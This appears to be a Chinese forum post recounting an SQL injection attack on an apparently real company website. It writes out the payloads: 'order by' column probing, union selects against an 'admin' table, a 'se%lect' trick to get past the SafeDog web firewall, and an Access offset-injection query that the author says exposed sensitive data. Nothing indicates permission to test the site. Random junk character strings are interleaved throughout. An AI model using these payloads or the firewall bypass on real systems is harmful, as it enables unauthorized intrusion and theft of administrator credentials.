打开网站,一个企业站。
& u4 _0 V \7 v: x# A
) d* `# s! f* m' P! D% }$ y3 |+ x- \$ r) p2 I5 B9 f8 r
顺手加个admin; w9 ` R! I% v9 `, A
8 i. s; E# E" e
# u) q+ V0 |, V" s& i9 N& k默认后台。
5 t+ v( V( ~" E ~3 V: g回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
3 @8 v. D5 n/ q7 \( W
( k7 h9 i+ U/ R6 {5 n; i
' V2 f i" q/ e: W$ ]" m& z/ b2 N8 B: m; m9 S/ T, s
所以就不用御剑扫了,待会直接封IP。
( w. d/ R6 m/ e B" K7 t' w
4 t" D1 n' n0 j4 V6 O# m用order by语句判断是否存在注入。9 h A) [' G* H; F9 L5 a
http://www.xxx.com /product_show.asp?id=997 order by 1
; H& K' y2 _6 B6 }& @http://www.xxx.com /product_show.asp?id=997 order by 100
6 [) u+ M6 o r! M现在存在注入,经测试后发现是9个字段。
% Z3 i' A/ o. |# |- s% I
! e) H: D- I( ] V' x' H- O接下来进行联合查询,猜是否存在admin表。9 I" V% S3 Y, l. p- S
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。! X7 z, w. f; n* Q' }
8 |4 j6 }6 Z+ s& V: ^/ w+ }0 M8 F' L: N8 l' X- K3 Z
' U# D+ j/ H7 o: c0 j V在select中间加个%,se%lect绕过安全狗。
7 I; ?8 x: z# S v: h# f k/ o. j, _+ h# }( E% S2 o
+ R5 X6 s8 A1 ^
发现存在admin表,然后开始手工猜常用的字段。
' X2 R' ^: O6 _ U纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
3 f5 E- o6 V+ g# W3 c! N/ I g+ N3 A8 Y+ d; q" I
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
1 o) _9 o$ R6 Z/ O1 X+ i
, `- k) v( W1 p6 O+ x. y, w科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。3 J' i y0 h7 Q0 }0 Z
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
, ?. z4 e# A6 @2 n好了,敏感内容出显了。
3 H1 s: v; A l7 s4 _
4 W+ ]' {7 ?5 {$ _3 ]3 k( G+ P3 H+ V2 ?5 E% I* m3 n
9 x! B$ j' l9 h' \. a; j9 Q |